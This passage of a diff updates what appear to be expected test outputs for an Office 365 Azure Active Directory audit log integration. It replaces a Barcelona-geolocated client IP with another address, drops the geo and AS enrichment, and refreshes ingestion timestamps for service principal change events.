APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -8601,25 +7863,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -8633,7 +7877,7 @@ "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -8769,7 +8013,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -8781,12 +8025,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036351800Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:17:00\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"b2484c3c-5461-43ab-850b-70fccf706796\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:00.2133065Z\"},{\"Name\":\"env_epoch\",\"Value\":\"OLE3R\"},{\"Name\":\"env_seqNum\",\"Value\":\"55908041\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##53a69eec-6bcd-473f-9c68-150d680e0776_00000000-0000-0000-0000-000000000000_53a69eec-6bcd-473f-9c68-150d680e0776\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR551\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"7bca6665-4d58-4df9-bd34-4d92e1fc63aa\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125073500Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:17:00\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"b2484c3c-5461-43ab-850b-70fccf706796\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:00.2133065Z\"},{\"Name\":\"env_epoch\",\"Value\":\"OLE3R\"},{\"Name\":\"env_seqNum\",\"Value\":\"55908041\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##53a69eec-6bcd-473f-9c68-150d680e0776_00000000-0000-0000-0000-000000000000_53a69eec-6bcd-473f-9c68-150d680e0776\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR551\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"7bca6665-4d58-4df9-bd34-4d92e1fc63aa\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -8812,25 +8056,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -8844,7 +8070,7 @@ "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -8980,7 +8206,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -8992,12 +8218,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036356200Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:17:00\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"b2484c3c-5461-43ab-850b-70fccf706796\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:00.2133065Z\"},{\"Name\":\"env_epoch\",\"Value\":\"OLE3R\"},{\"Name\":\"env_seqNum\",\"Value\":\"55908041\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##53a69eec-6bcd-473f-9c68-150d680e0776_00000000-0000-0000-0000-000000000000_53a69eec-6bcd-473f-9c68-150d680e0776\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR551\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"7bca6665-4d58-4df9-bd34-4d92e1fc63aa\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125080400Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:17:00\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"b2484c3c-5461-43ab-850b-70fccf706796\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:00.2133065Z\"},{\"Name\":\"env_epoch\",\"Value\":\"OLE3R\"},{\"Name\":\"env_seqNum\",\"Value\":\"55908041\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##53a69eec-6bcd-473f-9c68-150d680e0776_00000000-0000-0000-0000-000000000000_53a69eec-6bcd-473f-9c68-150d680e0776\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR551\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"7bca6665-4d58-4df9-bd34-4d92e1fc63aa\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c53935